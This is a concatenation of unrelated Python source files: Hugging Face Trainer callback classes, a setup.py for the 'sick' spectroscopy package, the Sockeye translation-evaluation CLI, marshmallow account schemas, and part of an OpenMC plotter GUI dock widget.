            When tracking the best model, the name of the checkpoint for the best model encountered so far.
is_local_process_zero (`bool`, *optional*, defaults to `True`):
Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on
several machines) main process.
is_world_process_zero (`bool`, *optional*, defaults to `True`):
Whether or not this process is the global main process (when training in a distributed fashion on several
machines, this is only going to be `True` for one process).
is_hyper_param_search (`bool`, *optional*, defaults to `False`):
            Whether we are in the process of a hyperparameter search using Trainer.hyperparameter_search. This will
impact the way data will be logged in TensorBoard.
"""
epoch: Optional[float] = None
global_step: int = 0
max_steps: int = 0
num_train_epochs: int = 0
total_flos: float = 0
log_history: List[Dict[str, float]] = None
best_metric: Optional[float] = None
best_model_checkpoint: Optional[str] = None
is_local_process_zero: bool = True
is_world_process_zero: bool = True
is_hyper_param_search: bool = False
trial_name: str = None
trial_params: Dict[str, Union[str, float, int, bool]] = None
def __post_init__(self):
if self.log_history is None:
self.log_history = []
def save_to_json(self, json_path: str):
"""Save the content of this instance in JSON format inside `json_path`."""
json_string = json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + "\n"
with open(json_path, "w", encoding="utf-8") as f:
f.write(json_string)
@classmethod
def load_from_json(cls, json_path: str):
"""Create an instance from the content of `json_path`."""
with open(json_path, "r", encoding="utf-8") as f:
text = f.read()
return cls(**json.loads(text))
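# A minimal, illustrative sketch of TrainerState's JSON round-trip. It is kept
# as a comment so nothing executes at import time; the file name below is
# hypothetical.
#
#     state = TrainerState(global_step=10, max_steps=100)
#     state.save_to_json("trainer_state.json")
#     restored = TrainerState.load_from_json("trainer_state.json")
#     assert restored.global_step == 10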
@dataclass
class TrainerControl:
"""
A class that handles the [`Trainer`] control flow. This class is used by the
[`TrainerCallback`] to activate some switches in the training loop.
Args:
should_training_stop (`bool`, *optional*, defaults to `False`):
Whether or not the training should be interrupted.
If `True`, this variable will not be set back to `False`. The training will just stop.
should_epoch_stop (`bool`, *optional*, defaults to `False`):
Whether or not the current epoch should be interrupted.
If `True`, this variable will be set back to `False` at the beginning of the next epoch.
should_save (`bool`, *optional*, defaults to `False`):
Whether or not the model should be saved at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
should_evaluate (`bool`, *optional*, defaults to `False`):
Whether or not the model should be evaluated at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
should_log (`bool`, *optional*, defaults to `False`):
Whether or not the logs should be reported at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
"""
should_training_stop: bool = False
should_epoch_stop: bool = False
should_save: bool = False
should_evaluate: bool = False
should_log: bool = False
def _new_training(self):
"""Internal method that resets the variable for a new training."""
self.should_training_stop = False
def _new_epoch(self):
"""Internal method that resets the variable for a new epoch."""
self.should_epoch_stop = False
def _new_step(self):
"""Internal method that resets the variable for a new step."""
self.should_save = False
self.should_evaluate = False
self.should_log = False
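# A hedged sketch of how a callback typically drives these flags (kept as a
# comment; `MyCheckpointCallback` is hypothetical and `TrainerCallback` is the
# base class defined just below in this module):
#
#     class MyCheckpointCallback(TrainerCallback):
#         def on_step_end(self, args, state, control, **kwargs):
#             if state.global_step % 500 == 0:
#                 control.should_save = True
#             return control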
class TrainerCallback:
"""
A class for objects that will inspect the state of the training loop at some events and take some decisions. At
each of those events the following arguments are available:
Args:
args ([`TrainingArguments`]):
The training arguments used to instantiate the [`Trainer`].
state ([`TrainerState`]):
The current state of the [`Trainer`].
control ([`TrainerControl`]):
The object that is returned to the [`Trainer`] and can be used to make some decisions.
model ([`PreTrainedModel`] or `torch.nn.Module`):
The model being trained.
tokenizer ([`PreTrainedTokenizer`]):
The tokenizer used for encoding the data.
optimizer (`torch.optim.Optimizer`):
The optimizer used for the training steps.
lr_scheduler (`torch.optim.lr_scheduler.LambdaLR`):
The scheduler used for setting the learning rate.
train_dataloader (`torch.utils.data.DataLoader`, *optional*):
The current dataloader used for training.
        eval_dataloader (`torch.utils.data.DataLoader`, *optional*):
            The current dataloader used for evaluation.
metrics (`Dict[str, float]`):
The metrics computed by the last evaluation phase.
Those are only accessible in the event `on_evaluate`.
logs (`Dict[str, float]`):
The values to log.
Those are only accessible in the event `on_log`.
The `control` object is the only one that can be changed by the callback, in which case the event that changes
it should return the modified version.
    The arguments `args`, `state` and `control` are positional for all events; all the others are
    grouped in `kwargs`. You can unpack the ones you need in the signature of the event. As an example,
    see the code of the simple [`~transformers.PrinterCallback`].
Example:
```python
class PrinterCallback(TrainerCallback):
def on_log(self, args, state, control, logs=None, **kwargs):
_ = logs.pop("total_flos", None)
if state.is_local_process_zero:
print(logs)
```"""
def on_init_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of the initialization of the [`Trainer`].
"""
pass
def on_train_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of training.
"""
pass
def on_train_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of training.
"""
pass
def on_epoch_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of an epoch.
"""
pass
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of an epoch.
"""
pass
def on_step_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of a training step. If using gradient accumulation, one training step might take
several inputs.
"""
pass
def on_substep_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
        Event called at the end of a substep during gradient accumulation.
"""
pass
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of a training step. If using gradient accumulation, one training step might take
several inputs.
"""
pass
def on_evaluate(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after an evaluation phase.
"""
pass
def on_save(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after a checkpoint save.
"""
pass
def on_log(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after logging the last logs.
"""
pass
def on_prediction_step(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after a prediction step.
"""
pass
class CallbackHandler(TrainerCallback):
"""Internal class that just calls the list of callbacks in order."""
def __init__(self, callbacks, model, tokenizer, optimizer, lr_scheduler):
self.callbacks = []
for cb in callbacks:
self.add_callback(cb)
self.model = model
self.tokenizer = tokenizer
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.train_dataloader = None
self.eval_dataloader = None
if not any(isinstance(cb, DefaultFlowCallback) for cb in self.callbacks):
logger.warning(
"The Trainer will not work properly if you don't have a `DefaultFlowCallback` in its callbacks. You\n"
+ "should add one before training with `trainer.add_callback(DefaultFlowCallback). The current list of"
+ "callbacks is\n:"
+ self.callback_list
)
def add_callback(self, callback):
cb = callback() if isinstance(callback, type) else callback
cb_class = callback if isinstance(callback, type) else callback.__class__
if cb_class in [c.__class__ for c in self.callbacks]:
logger.warning(
f"You are adding a {cb_class} to the callbacks of this Trainer, but there is already one. The current"
+ "list of callbacks is\n:"
+ self.callback_list
)
self.callbacks.append(cb)
def pop_callback(self, callback):
if isinstance(callback, type):
for cb in self.callbacks:
if isinstance(cb, callback):
self.callbacks.remove(cb)
return cb
else:
for cb in self.callbacks:
if cb == callback:
self.callbacks.remove(cb)
return cb
def remove_callback(self, callback):
if isinstance(callback, type):
for cb in self.callbacks:
if isinstance(cb, callback):
self.callbacks.remove(cb)
return
else:
self.callbacks.remove(callback)
@property
def callback_list(self):
return "\n".join(cb.__class__.__name__ for cb in self.callbacks)
def on_init_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_init_end", args, state, control)
def on_train_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_training_stop = False
return self.call_event("on_train_begin", args, state, control)
def on_train_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_train_end", args, state, control)
def on_epoch_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_epoch_stop = False
return self.call_event("on_epoch_begin", args, state, control)
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_epoch_end", args, state, control)
def on_step_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_log = False
control.should_evaluate = False
control.should_save = False
return self.call_event("on_step_begin", args, state, control)
def on_substep_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_substep_end", args, state, control)
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_step_end", args, state, control)
def on_evaluate(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, metrics):
control.should_evaluate = False
return self.call_event("on_evaluate", args, state, control, metrics=metrics)
def on_save(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_save = False
return self.call_event("on_save", args, state, control)
def on_log(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, logs):
control.should_log = False
return self.call_event("on_log", args, state, control, logs=logs)
def on_prediction_step(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_prediction_step", args, state, control)
def call_event(self, event, args, state, control, **kwargs):
for callback in self.callbacks:
result = getattr(callback, event)(
args,
state,
control,
model=self.model,
tokenizer=self.tokenizer,
optimizer=self.optimizer,
lr_scheduler=self.lr_scheduler,
train_dataloader=self.train_dataloader,
eval_dataloader=self.eval_dataloader,
**kwargs,
)
# A Callback can skip the return of `control` if it doesn't change it.
if result is not None:
control = result
return control
class DefaultFlowCallback(TrainerCallback):
"""
A [`TrainerCallback`] that handles the default flow of the training loop for logs, evaluation
and checkpoints.
"""
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
# Log
if state.global_step == 1 and args.logging_first_step:
control.should_log = True
if args.logging_strategy == IntervalStrategy.STEPS and state.global_step % args.logging_steps == 0:
control.should_log = True
# Evaluate
if args.evaluation_strategy == IntervalStrategy.STEPS and state.global_step % args.eval_steps == 0:
control.should_evaluate = True
# Save
if (
args.save_strategy == IntervalStrategy.STEPS
and args.save_steps > 0
and state.global_step % args.save_steps == 0
):
control.should_save = True
# End training
if state.global_step >= state.max_steps:
control.should_training_stop = True
return control
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
# Log
if args.logging_strategy == IntervalStrategy.EPOCH:
control.should_log = True
# Evaluate
if args.evaluation_strategy == IntervalStrategy.EPOCH:
control.should_evaluate = True
# Save
if args.save_strategy == IntervalStrategy.EPOCH:
control.should_save = True
return control
class ProgressCallback(TrainerCallback):
"""
A [`TrainerCallback`] that displays the progress of training or evaluation.
"""
def __init__(self):
self.training_bar = None
self.prediction_bar = None
def on_train_begin(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar = tqdm(total=state.max_steps)
self.current_step = 0
def on_step_end(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar.update(state.global_step - self.current_step)
self.current_step = state.global_step
def on_prediction_step(self, args, state, control, eval_dataloader=None, **kwargs):
if state.is_local_process_zero and isinstance(eval_dataloader.dataset, collections.abc.Sized):
if self.prediction_bar is None:
self.prediction_bar = tqdm(total=len(eval_dataloader), leave=self.training_bar is None)
self.prediction_bar.update(1)
def on_evaluate(self, args, state, control, **kwargs):
if state.is_local_process_zero:
if self.prediction_bar is not None:
self.prediction_bar.close()
self.prediction_bar = None
def on_log(self, args, state, control, logs=None, **kwargs):
if state.is_local_process_zero and self.training_bar is not None:
_ = logs.pop("total_flos", None)
self.training_bar.write(str(logs))
def on_train_end(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar.close()
self.training_bar = None
class PrinterCallback(TrainerCallback):
"""
A bare [`TrainerCallback`] that just prints the logs.
"""
def on_log(self, args, state, control, logs=None, **kwargs):
_ = logs.pop("total_flos", None)
if state.is_local_process_zero:
print(logs)
class EarlyStoppingCallback(TrainerCallback):
"""
A [`TrainerCallback`] that handles early stopping.
Args:
early_stopping_patience (`int`):
Use with `metric_for_best_model` to stop training when the specified metric worsens for
`early_stopping_patience` evaluation calls.
        early_stopping_threshold (`float`, *optional*):
            Use with TrainingArguments `metric_for_best_model` and `early_stopping_patience` to denote how
            much the specified metric must improve to satisfy early stopping conditions.
    This callback depends on the [`TrainingArguments`] argument *load_best_model_at_end* to set
    best_metric in [`TrainerState`].
"""
def __init__(self, early_stopping_patience: int = 1, early_stopping_threshold: Optional[float] = 0.0):
self.early_stopping_patience = early_stopping_patience
self.early_stopping_threshold = early_stopping_threshold
# early_stopping_patience_counter denotes the number of times validation metrics failed to improve.
self.early_stopping_patience_counter = 0
def check_metric_value(self, args, state, control, metric_value):
# best_metric is set by code for load_best_model
operator = np.greater if args.greater_is_better else np.less
if state.best_metric is None or (
operator(metric_value, state.best_metric)
and abs(metric_value - state.best_metric) > self.early_stopping_threshold
):
self.early_stopping_patience_counter = 0
else:
self.early_stopping_patience_counter += 1
def on_train_begin(self, args, state, control, **kwargs):
assert args.load_best_model_at_end, "EarlyStoppingCallback requires load_best_model_at_end = True"
assert (
args.metric_for_best_model is not None
), "EarlyStoppingCallback requires metric_for_best_model is defined"
assert (
args.evaluation_strategy != IntervalStrategy.NO
), "EarlyStoppingCallback requires IntervalStrategy of steps or epoch"
def on_evaluate(self, args, state, control, metrics, **kwargs):
metric_to_check = args.metric_for_best_model
if not metric_to_check.startswith("eval_"):
metric_to_check = f"eval_{metric_to_check}"
metric_value = metrics.get(metric_to_check)
if metric_value is None:
logger.warning(
f"early stopping required metric_for_best_model, but did not find {metric_to_check} so early stopping is disabled"
)
return
self.check_metric_value(args, state, control, metric_value)
if self.early_stopping_patience_counter >= self.early_stopping_patience:
control.should_training_stop = True
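# A hedged usage sketch for EarlyStoppingCallback (kept as a comment so it does
# not run at import time; `model`, `train_ds` and `eval_ds` are hypothetical
# objects supplied by the caller, and `Trainer`/`TrainingArguments` come from
# this library):
#
#     args = TrainingArguments(
#         output_dir="out",
#         evaluation_strategy="epoch",
#         load_best_model_at_end=True,
#         metric_for_best_model="loss",
#         greater_is_better=False,
#     )
#     trainer = Trainer(model=model, args=args, train_dataset=train_ds,
#                       eval_dataset=eval_ds,
#                       callbacks=[EarlyStoppingCallback(early_stopping_patience=3)])
#     trainer.train()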
|
py | 1a4a100f3b0bbef91c9067234912963c19801bde | # coding: utf-8
""" sick, the spectroscopic inference crank """
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
major, minor1, minor2, release, serial = sys.version_info
open_kwargs = {"encoding": "utf-8"} if major >= 3 else {}
def rf(filename):
with open(filename, **open_kwargs) as fp:
contents = fp.read()
return contents
version_regex = re.compile("__version__ = \"(.*?)\"")
contents = rf(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"sick", "__init__.py"))
version = version_regex.findall(contents)[0]
setup(name="sick",
version=version,
author="Andrew R. Casey",
author_email="[email protected]",
packages=[
"sick",
"sick.models",
"sick.clis",
"sick.specutils"],#"sick.tests"],
url="http://www.github.com/andycasey/sick/",
license="MIT",
description="Infer astrophysical parameters from spectra",
long_description=rf(os.path.join(os.path.dirname(__file__), "README.md")),
install_requires=rf(
os.path.join(os.path.dirname(__file__), "requirements.md")).split("\n"),
entry_points={
"console_scripts": [
"sick-models = sick.clis.models:main",
"sick = sick.clis.run:main"
]
}
)
|
py | 1a4a105b7e3b2e90015dde84367919f1620e23d3 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
Evaluation CLI.
"""
import argparse
import logging
import sys
from collections import defaultdict
from functools import partial
from typing import Callable, Iterable, Dict, List, Tuple, Optional
import numpy as np
from contrib import sacrebleu, rouge
from . import arguments
from . import constants as C
from . import data_io
from . import utils
from .log import setup_main_logger, log_sockeye_version
logger = setup_main_logger(__name__, file_logging=False)
def raw_corpus_bleu(hypotheses: Iterable[str], references: Iterable[str], offset: Optional[float] = 0.01) -> float:
"""
Simple wrapper around sacreBLEU's BLEU without tokenization and smoothing.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:param offset: Smoothing constant.
:return: BLEU score as float between 0 and 1.
"""
return sacrebleu.raw_corpus_bleu(hypotheses, [references], smooth_floor=offset).score / 100.0
def raw_corpus_chrf(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around sacreBLEU's chrF implementation, without tokenization.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: chrF score as float between 0 and 1.
"""
return sacrebleu.corpus_chrf(hypotheses, references, order=sacrebleu.CHRF_ORDER, beta=sacrebleu.CHRF_BETA,
remove_whitespace=True)
def raw_corpus_rouge1(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around ROUGE-1 implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-1 score as float between 0 and 1.
"""
return rouge.rouge_1(hypotheses, references)
def raw_corpus_rouge2(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around ROUGE-2 implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-2 score as float between 0 and 1.
"""
return rouge.rouge_2(hypotheses, references)
def raw_corpus_rougel(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
    Simple wrapper around ROUGE-L implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-L score as float between 0 and 1.
"""
return rouge.rouge_l(hypotheses, references)
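# A small illustrative sketch of the wrappers above (kept as a comment so the
# module has no import-time side effects; the sentences are made-up toy data):
#
#     hyps = ["the cat sat on the mat", "a quick brown fox"]
#     refs = ["the cat sat on the mat", "the quick brown fox"]
#     print(raw_corpus_bleu(hyps, refs))    # float between 0 and 1
#     print(raw_corpus_chrf(hyps, refs))    # float between 0 and 1
#     print(raw_corpus_rougel(hyps, refs))  # float between 0 and 1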
def main():
params = argparse.ArgumentParser(description='Evaluate translations by calculating metrics with '
                                                 'respect to a reference set. If multiple hypotheses files are given, '
                                                 'the mean and standard deviation of the metrics are reported.')
arguments.add_evaluate_args(params)
arguments.add_logging_args(params)
args = params.parse_args()
if args.quiet:
logger.setLevel(logging.ERROR)
utils.check_condition(args.offset >= 0, "Offset should be non-negative.")
log_sockeye_version(logger)
logger.info("Command: %s", " ".join(sys.argv))
logger.info("Arguments: %s", args)
references = [' '.join(e) for e in data_io.read_content(args.references)]
all_hypotheses = [[h.strip() for h in hypotheses] for hypotheses in args.hypotheses]
if not args.not_strict:
for hypotheses in all_hypotheses:
utils.check_condition(len(hypotheses) == len(references),
"Number of hypotheses (%d) and references (%d) does not match." % (len(hypotheses),
len(references)))
logger.info("%d hypothesis set(s) | %d hypotheses | %d references",
len(all_hypotheses), len(all_hypotheses[0]), len(references))
metric_info = ["%s\t(s_opt)" % name for name in args.metrics]
logger.info("\t".join(metric_info))
metrics = [] # type: List[Tuple[str, Callable]]
for name in args.metrics:
if name == C.BLEU:
func = partial(raw_corpus_bleu, offset=args.offset)
elif name == C.CHRF:
func = raw_corpus_chrf
elif name == C.ROUGE1:
func = raw_corpus_rouge1
elif name == C.ROUGE2:
func = raw_corpus_rouge2
elif name == C.ROUGEL:
func = raw_corpus_rougel
else:
raise ValueError("Unknown metric %s." % name)
metrics.append((name, func))
if not args.sentence:
scores = defaultdict(list) # type: Dict[str, List[float]]
for hypotheses in all_hypotheses:
for name, metric in metrics:
scores[name].append(metric(hypotheses, references))
_print_mean_std_score(metrics, scores)
else:
for hypotheses in all_hypotheses:
for h, r in zip(hypotheses, references):
scores = defaultdict(list) # type: Dict[str, List[float]]
for name, metric in metrics:
scores[name].append(metric([h], [r]))
_print_mean_std_score(metrics, scores)
def _print_mean_std_score(metrics: List[Tuple[str, Callable]], scores: Dict[str, List[float]]):
scores_mean_std = [] # type: List[str]
for name, _ in metrics:
if len(scores[name]) > 1:
score_mean = np.asscalar(np.mean(scores[name]))
score_std = np.asscalar(np.std(scores[name], ddof=1))
scores_mean_std.append("%.3f\t%.3f" % (score_mean, score_std))
else:
score = scores[name][0]
scores_mean_std.append("%.3f\t(-)" % score)
print("\t".join(scores_mean_std))
if __name__ == '__main__':
main()
|
py | 1a4a10f7e2e87e1bb24c7a8326f9e2298ca9d362 | from marshmallow import fields
from marshmallow_sqlalchemy import (SQLAlchemyAutoSchema, SQLAlchemySchema,
auto_field)
from accounts.db import Account
from .account_address_schema import AccountAddressDetailSchema
from .fields import SmartNested
from .validators import LocaleValidator, TimezoneValidator
class AccountDetailSchema(SQLAlchemyAutoSchema):
addresses = SmartNested(AccountAddressDetailSchema, many=True)
primary_address = SmartNested(AccountAddressDetailSchema, load_default=None)
locale = auto_field(validate=LocaleValidator())
timezone = auto_field(validate=TimezoneValidator())
class Meta:
model = Account
class AccountPartialUpdateSchema(SQLAlchemyAutoSchema):
class Meta:
model = Account
include_fk = True
include_relationships = True
class AccountForeignSchema(SQLAlchemySchema):
pk = auto_field(required=True)
include_addresses = fields.Boolean(load_default=False, load_only=True)
include_primary_address = fields.Boolean(load_default=False, load_only=True)
class Meta:
model = Account
load_instance = False
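# A hedged usage sketch for these schemas (kept as a comment; `account` is a
# hypothetical, already-populated Account instance -- it is not defined in this
# module):
#
#     schema = AccountDetailSchema()
#     payload = schema.dump(account)     # serializes nested addresses as well
#     errors = schema.validate(payload)  # runs the locale/timezone validators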
|
py | 1a4a11cebdd7b139f65e88315e90d25aab1a10fc | from functools import partial
from collections.abc import Iterable
from collections import defaultdict
from PySide2 import QtCore
from PySide2.QtWidgets import (QWidget, QPushButton, QHBoxLayout, QVBoxLayout,
QGroupBox, QFormLayout, QLabel, QLineEdit,
QComboBox, QSpinBox, QDoubleSpinBox, QSizePolicy,
QCheckBox, QDockWidget, QScrollArea, QListWidget,
QListWidgetItem, QTreeWidget, QTreeWidgetItem)
from matplotlib import cm as mcolormaps
import numpy as np
import openmc
from .custom_widgets import HorizontalLine, Expander
from .scientific_spin_box import ScientificDoubleSpinBox
from .plotmodel import (_SCORE_UNITS, _TALLY_VALUES,
_REACTION_UNITS, _SPATIAL_FILTERS)
class PlotterDock(QDockWidget):
"""
Dock widget with common settings for the plotting application
"""
def __init__(self, model, font_metric, parent=None):
super().__init__(parent)
self.model = model
self.font_metric = font_metric
self.main_window = parent
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)
class DomainDock(PlotterDock):
"""
Domain options dock
"""
def __init__(self, model, font_metric, parent=None):
super().__init__(model, font_metric, parent)
self.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea)
# Create Controls
self._createOriginBox()
self._createOptionsBox()
self._createResolutionBox()
# Create submit button
self.applyButton = QPushButton("Apply Changes")
# Mac bug fix
self.applyButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.applyButton.clicked.connect(self.main_window.applyChanges)
# Create Zoom box
self.zoomBox = QSpinBox()
self.zoomBox.setSuffix(' %')
self.zoomBox.setRange(25, 2000)
self.zoomBox.setValue(100)
self.zoomBox.setSingleStep(25)
self.zoomBox.valueChanged.connect(self.main_window.editZoom)
self.zoomLayout = QHBoxLayout()
self.zoomLayout.addWidget(QLabel('Zoom:'))
self.zoomLayout.addWidget(self.zoomBox)
self.zoomLayout.setContentsMargins(0, 0, 0, 0)
self.zoomWidget = QWidget()
self.zoomWidget.setLayout(self.zoomLayout)
# Create Layout
self.dockLayout = QVBoxLayout()
self.dockLayout.addWidget(QLabel("Geometry/Properties"))
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.originGroupBox)
self.dockLayout.addWidget(self.optionsGroupBox)
self.dockLayout.addWidget(self.resGroupBox)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.zoomWidget)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addStretch()
self.dockLayout.addWidget(self.applyButton)
self.dockLayout.addWidget(HorizontalLine())
self.optionsWidget = QWidget()
self.optionsWidget.setLayout(self.dockLayout)
self.setWidget(self.optionsWidget)
def _createOriginBox(self):
# X Origin
self.xOrBox = QDoubleSpinBox()
self.xOrBox.setDecimals(9)
self.xOrBox.setRange(-99999, 99999)
xbox_connector = partial(self.main_window.editSingleOrigin,
dimension=0)
self.xOrBox.valueChanged.connect(xbox_connector)
# Y Origin
self.yOrBox = QDoubleSpinBox()
self.yOrBox.setDecimals(9)
self.yOrBox.setRange(-99999, 99999)
ybox_connector = partial(self.main_window.editSingleOrigin,
dimension=1)
self.yOrBox.valueChanged.connect(ybox_connector)
# Z Origin
self.zOrBox = QDoubleSpinBox()
self.zOrBox.setDecimals(9)
self.zOrBox.setRange(-99999, 99999)
zbox_connector = partial(self.main_window.editSingleOrigin,
dimension=2)
self.zOrBox.valueChanged.connect(zbox_connector)
# Origin Form Layout
self.orLayout = QFormLayout()
self.orLayout.addRow('X:', self.xOrBox)
self.orLayout.addRow('Y:', self.yOrBox)
self.orLayout.addRow('Z:', self.zOrBox)
self.orLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.orLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Origin Group Box
self.originGroupBox = QGroupBox('Origin')
self.originGroupBox.setLayout(self.orLayout)
def _createOptionsBox(self):
# Width
self.widthBox = QDoubleSpinBox(self)
self.widthBox.setRange(.1, 99999)
self.widthBox.setDecimals(9)
self.widthBox.valueChanged.connect(self.main_window.editWidth)
# Height
self.heightBox = QDoubleSpinBox(self)
self.heightBox.setRange(.1, 99999)
self.heightBox.setDecimals(9)
self.heightBox.valueChanged.connect(self.main_window.editHeight)
# ColorBy
self.colorbyBox = QComboBox(self)
self.colorbyBox.addItem("material")
self.colorbyBox.addItem("cell")
self.colorbyBox.addItem("temperature")
self.colorbyBox.addItem("density")
self.colorbyBox.currentTextChanged[str].connect(
self.main_window.editColorBy)
# Universe level (applies to cell coloring only)
self.universeLevelBox = QComboBox(self)
self.universeLevelBox.addItem('all')
for i in range(self.model.max_universe_levels):
self.universeLevelBox.addItem(str(i))
self.universeLevelBox.currentTextChanged[str].connect(
self.main_window.editUniverseLevel)
# Alpha
self.domainAlphaBox = QDoubleSpinBox(self)
self.domainAlphaBox.setValue(self.model.activeView.domainAlpha)
self.domainAlphaBox.setSingleStep(0.05)
self.domainAlphaBox.setDecimals(2)
self.domainAlphaBox.setRange(0.0, 1.0)
self.domainAlphaBox.valueChanged.connect(self.main_window.editPlotAlpha)
# Visibility
self.visibilityBox = QCheckBox(self)
self.visibilityBox.stateChanged.connect(
self.main_window.editPlotVisibility)
# Outlines
self.outlinesBox = QCheckBox(self)
self.outlinesBox.stateChanged.connect(self.main_window.toggleOutlines)
# Basis
self.basisBox = QComboBox(self)
self.basisBox.addItem("xy")
self.basisBox.addItem("xz")
self.basisBox.addItem("yz")
self.basisBox.currentTextChanged.connect(self.main_window.editBasis)
# Advanced Color Options
self.colorOptionsButton = QPushButton('Color Options...')
self.colorOptionsButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.colorOptionsButton.clicked.connect(self.main_window.showColorDialog)
# Options Form Layout
self.opLayout = QFormLayout()
self.opLayout.addRow('Width:', self.widthBox)
self.opLayout.addRow('Height:', self.heightBox)
self.opLayout.addRow('Basis:', self.basisBox)
self.opLayout.addRow('Color By:', self.colorbyBox)
self.opLayout.addRow('Universe Level:', self.universeLevelBox)
self.opLayout.addRow('Plot alpha:', self.domainAlphaBox)
self.opLayout.addRow('Visible:', self.visibilityBox)
self.opLayout.addRow('Outlines:', self.outlinesBox)
self.opLayout.addRow(self.colorOptionsButton)
self.opLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.opLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Options Group Box
self.optionsGroupBox = QGroupBox('Options')
self.optionsGroupBox.setLayout(self.opLayout)
def _createResolutionBox(self):
# Horizontal Resolution
self.hResBox = QSpinBox(self)
self.hResBox.setRange(1, 99999)
self.hResBox.setSingleStep(25)
self.hResBox.setSuffix(' px')
self.hResBox.valueChanged.connect(self.main_window.editHRes)
# Vertical Resolution
self.vResLabel = QLabel('Pixel Height:')
self.vResBox = QSpinBox(self)
self.vResBox.setRange(1, 99999)
self.vResBox.setSingleStep(25)
self.vResBox.setSuffix(' px')
self.vResBox.valueChanged.connect(self.main_window.editVRes)
# Ratio checkbox
self.ratioCheck = QCheckBox("Fixed Aspect Ratio", self)
self.ratioCheck.stateChanged.connect(self.main_window.toggleAspectLock)
# Resolution Form Layout
self.resLayout = QFormLayout()
self.resLayout.addRow(self.ratioCheck)
self.resLayout.addRow('Pixel Width:', self.hResBox)
self.resLayout.addRow(self.vResLabel, self.vResBox)
self.resLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.resLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Resolution Group Box
self.resGroupBox = QGroupBox("Resolution")
self.resGroupBox.setLayout(self.resLayout)
def updateDock(self):
self.updateOrigin()
self.updateWidth()
self.updateHeight()
self.updateColorBy()
self.updateUniverseLevel()
self.updatePlotAlpha()
self.updatePlotVisibility()
self.updateOutlines()
self.updateBasis()
self.updateAspectLock()
self.updateHRes()
self.updateVRes()
def updateOrigin(self):
self.xOrBox.setValue(self.model.activeView.origin[0])
self.yOrBox.setValue(self.model.activeView.origin[1])
self.zOrBox.setValue(self.model.activeView.origin[2])
